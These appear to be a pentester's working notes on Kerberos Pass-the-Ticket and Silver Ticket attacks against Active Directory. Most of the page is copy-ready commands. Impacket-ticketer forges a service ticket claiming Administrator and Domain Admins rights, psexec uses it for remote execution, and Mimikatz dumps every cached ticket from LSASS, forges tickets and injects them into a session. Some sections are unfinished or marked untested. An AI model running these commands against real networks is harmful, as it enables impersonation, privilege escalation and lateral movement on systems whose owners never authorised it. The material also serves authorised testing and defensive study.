Kerberos tickets are not bound to the host they were obtained on: both a TGT and a service ticket (TGS) can be exported and re-injected on another machine. The difference is scope. A TGT (what Overpass-the-Hash produces) lets the holder ask the KDC for tickets to any service as that user, and is therefore noisier on the DC; a TGS is only good for the single SPN it was issued for, but using it never touches the KDC, which is why a forged TGS (silver ticket) works even against a service the DC knows nothing about.
Pass-the-Ticket (PtT) is taking an existing Kerberos ticket and injecting it to impersonate its owner. Mimikatz can dump either the current user's tickets (kerberos::list /export) or, with SeDebugPrivilege, every ticket cached for every logged-on user (sekurlsa::tickets /export); on a host configured for unconstrained delegation that cache also holds the TGTs of every user who has authenticated to it, which is a big deal. Once acquired, tickets can be injected with Mimikatz (or loaded into KRB5CCNAME on Kali) and used to access resources until they expire (10 hours by default for a TGT, renewable for 7 days).
- Pass the Ticket (HackTricks)
- Silver Ticket (HackTricks)
- QOMPLX Knowledge: Pass-the-Ticket Attacks Explained
- TarlogicSecurity/kerberos_attacks_cheatsheet.md
- Attack Methods for Gaining Domain Admin Rights in Active Directory
crackmapexec can authenticate with a ccache file as well: point KRB5CCNAME at it and run with Kerberos authentication (-k).
Prerequisites
- Forging the ticket itself needs nothing on the target. Using it with psexec does: psexec writes a service binary to the Admin$ share, so the impersonated user needs local administrative rights on the target (the default silver ticket claims RID 500 and Domain Admins, which satisfies this unless the service account's privileges have been restricted).
- The NT hash (or AES key) of the account that runs the service. For CIFS, HOST, RPCSS, WSMAN etc. that is the computer account; for IIS, SQL Server etc. running under a domain account it is that account's hash. Kerberoasting is the usual way to get there: the roasted TGS is encrypted with the service account's key, so cracking it yields the password, from which the hash is derived.
On Kali
TO COMPLETE
Get TGS
See Impacket-Ticketer below. Get the domain SID with enum4linux (or from the SID of any domain user).
The Silver Ticket attack forges a valid TGS for one service once the NTLM hash (or AES key) of the account running that service is known; for CIFS/HOST on a member server that is the computer account's hash. Because a TGS is encrypted with the service key and validated by the service alone, the forged ticket grants access as any user, with any group membership, without the KDC ever being consulted. See HackTricks.
Optional – Get Domain SID
From a domain-joined Windows host with the AD module: powershell Get-ADDomain (the DomainSID property).
From Kali, use enum4linux; the "Getting domain SID" block is near the top of its output. No need for a full report, so limit the output with -P (password policy only).
enum4linux -P -u $USER -p $PASS $IP
Optional – Get SPN
impacket-GetUserSPNs -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS} -outputfile SPNs.txt
Generate Silver Ticket
NTLM=<NT hash of the account running the service (the computer account for CIFS/HOST)>
DOMAIN_SID="S-1-5-21-1339291983-1349129144-367733775"
DOMAIN=example.com
SPN=cifs/machine.${DOMAIN}
The SPN must be in service/host form (class before the slash, FQDN of the host after it); a value like example/CIFS:445 is not an SPN and the service will reject the ticket. By default ticketer sets the user RID to 500 and includes the Domain Admins and other privileged groups (512, 513, 518, 519, 520) in the PAC.
impacket-ticketer -nthash $NTLM -domain-sid $DOMAIN_SID -domain $DOMAIN -spn $SPN baduser
Use Silver Ticket
export KRB5CCNAME=baduser.ccache
impacket-psexec ${DOMAIN}/baduser@machine.${DOMAIN} -k -no-pass
The FQDN after @ must be the host named in the SPN, since Kerberos matches the ticket on name, not IP; if it does not resolve, add -target-ip with the host's address.
Get Kerberos TGT tickets
This step is not needed for a silver ticket (the forged TGS bypasses the KDC entirely). It is the Pass-the-Ticket variant with a legitimate TGT: getTGT writes a ccache that can be used through KRB5CCNAME exactly like the forged one above.
IP=x.x.x.x
DC_IP=y.y.y.y
HASH=abc...def
USER=myuser
DOMAIN=example.com
PASS=MyPassword
impacket-getTGT -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS}
Can also pass the hash to get it 😉
impacket-getTGT -dc-ip $DC_IP -hashes :${HASH} ${DOMAIN}/${USER}
On Windows
Get Domain name
systeminfo | findstr /B /C:"Domain"
Get SID of current user
Example: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-YYYY. The domain SID is everything before the last dash (S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX); the last component, YYYY, is the user's RID.
You must be logged on with a domain account, otherwise whoami /user prints the SID of a local account, which has the same S-1-5-21 shape but belongs to the local machine's SID, not the domain's. When connecting with rdesktop, pass -d $DOMAIN so the logon is a domain logon.
whoami /user
Generate the RC4 hash from password
A silver ticket requires the password hash (the RC4/NT hash, or an AES key), not the cleartext password. kerberos::hash derives the NT hash from a password; adding /user: and /domain: also makes it print the AES128 and AES256 keys, which are salted with the uppercase realm and the account name.
mimikatz.exe
kerberos::hash /password:MyPassword
Generate a silver ticket for a service (like IIS, SQL Server, etc.)
Also see Mimikatz. The command says "golden" but with /target: and /service: it forges a silver ticket. /target: is the host part of the SPN (e.g. machine.example.com), /service: is the service class (HTTP, CIFS, MSSQLSvc, ...). /ptt injects the ticket straight into the current logon session. Note that kerberos::purge discards every ticket in the session first, including any legitimate ones you may still need.
mimikatz.exe
privilege::debug
kerberos::purge
kerberos::list
kerberos::golden /user:fakeuser /domain:example.com /sid:S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /target:<host from SPN, e.g. machine.example.com> /service:HTTP /rc4:<NT hash of the service account> /ptt
kerberos::list
A new service ticket for the SPN is now in memory, with whatever group membership Mimikatz put in the PAC. By default the service will see the caller as the built-in Administrator (User Id 500) and a member of several highly privileged groups (Groups Id), including Domain Admins (512). Whether the service honours that depends on it not validating the PAC with the DC, which most services do not.
Export the ticket if you want to use it in Kali.
Copy the file to Kali after the export.
kerberos::list /export
Convert from the Mimikatz .kirbi format to the ccache format used by Impacket (and back: ticketConverter detects the input format by its first byte).
impacket-ticketConverter $TICKET_KIRBI $TICKET_CCACHE
Not tested. Unlike kerberos::list, sekurlsa::tickets reads LSASS memory and so needs privilege::debug (or SYSTEM); it dumps the tickets of every logged-on session, not just the current one.
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
Transfer the generated files to Kali.
impacket-ticketConverter ticket.kirbi ticket.ccache